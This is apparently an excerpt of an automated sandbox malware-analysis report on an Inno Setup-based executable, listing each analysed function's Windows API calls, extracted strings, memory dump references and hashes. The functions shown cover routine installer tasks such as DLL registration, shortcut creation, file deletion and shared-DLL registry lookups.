Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4

Function 0045C974 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C

Function 10001130 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2945315188.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.2945299426.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2945331467.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2

Function 10001000 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2945315188.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.2945299426.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2945331467.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction Fuzzy Hash:

Function 00457540 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845

Strings

Spawning _RegDLL.tmp, xrefs: 0045756C
REGDLL mutex wait failed (%d, %d), xrefs: 0045776F
MapViewOfFile, xrefs: 004575FA
_RegDLL.tmp %u %u, xrefs: 004576A1
LoadLibrary, xrefs: 004577A7
GetProcAddress, xrefs: 004577B9
REGDLL returned unknown result code %d, xrefs: 0045780C
_isetup\_RegDLL.tmp, xrefs: 00457677
CreateFileMapping, xrefs: 004575D3
REGDLL failed with exit code 0x%x, xrefs: 00457739
ReleaseMutex, xrefs: 0045765A
CreateMutex, xrefs: 0045759B
D, xrefs: 004576BA
OleInitialize, xrefs: 00457795
CreateProcess, xrefs: 00457702

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
API String ID: 4012871263-351310198
Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69

Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F

Strings

Ctl3dCtlColorEx, xrefs: 0041F20E
Ctl3dSubclassDlgEx, xrefs: 0041F1E4
Ctl3dRegister, xrefs: 0041F191
Ctl3dSubclassCtl, xrefs: 0041F1CF
Ctl3dDlgFramePaint, xrefs: 0041F1F9
Ctl3DColorChange, xrefs: 0041F24D
Ctl3dUnregister, xrefs: 0041F1BA
Ctl3dUnAutoSubclass, xrefs: 0041F238
CTL3D32.DLL, xrefs: 0041F159
BtnWndProc3d, xrefs: 0041F262
Ctl3dAutoSubclass, xrefs: 0041F223

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 2323315520-3614243559
Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D

Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
SelectObject.GDI32(00000000,?), ref: 0041CBFE
DeleteDC.GDI32(00000000), ref: 0041CC14

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
String ID:
API String ID: 1381628555-0
Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68

Function 00496894 Relevance: 28.3, APIs: 7, Strings: 9, Instructions: 251synchronizationCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B

Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D

Strings

oI, xrefs: 00496C1E
oI, xrefs: 004968B9, 004968C6, 004968DD, 004968EA, 0049697E, 00496988, 00496998, 004969A2
/REGU, xrefs: 004968ED
Setup, xrefs: 00496903
$pI, xrefs: 004969A5, 004969B2, 00496BAD, 00496A03
Inno-Setup-RegSvr-Mutex, xrefs: 00496921
.msg, xrefs: 0049698E
/REG, xrefs: 004968C9
.lst, xrefs: 004969A8

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
API String ID: 2000705611-3392794427
Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69

Function 00459DF8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66

Strings

.chw, xrefs: 00459EAD
Failed to delete the file; it may be in use (%d)., xrefs: 0045A055
.fts, xrefs: 00459E6C
Deleting file: %s, xrefs: 00459F05
Failed to strip read-only attribute., xrefs: 00459F4B
.lnk, xrefs: 00459ED3
.hlp, xrefs: 00459E2F
.chm, xrefs: 00459E94
.gid, xrefs: 00459E48
The file appears to be in use (%d). Will delete on restart., xrefs: 00459FAF
Stripped read-only attribute., xrefs: 00459F3F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A

Function 0045C2E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0045C2FA
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342

Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261

AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404

Strings

W, xrefs: 0045C412
SetNamedSecurityInfoW, xrefs: 0045C32E
SetEntriesInAclW, xrefs: 0045C33C
GetNamedSecurityInfoW, xrefs: 0045C321
advapi32.dll, xrefs: 0045C315

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
API String ID: 59345061-4263478283
Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9

Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON

Download Yara Rule

APIs

73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Object$Select$Delete$A26180A480A570Stretch
String ID:
API String ID: 359944910-0
Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4

Function 00471AE8 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 333COMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA

Strings

.pif, xrefs: 00471B97, 00471D23
.lnk, xrefs: 00471B74
.url, xrefs: 00471BBA
{group}\, xrefs: 00471B42
Filename: %s, xrefs: 00471C42
target.lnk, xrefs: 00471E24
Desktop.ini, xrefs: 00471E5B

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
API String ID: 971782779-3668018701
Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69

Function 00453D90 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9

Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C

Strings

, xrefs: 00453E1A
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
RegOpenKeyEx, xrefs: 00453E2C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
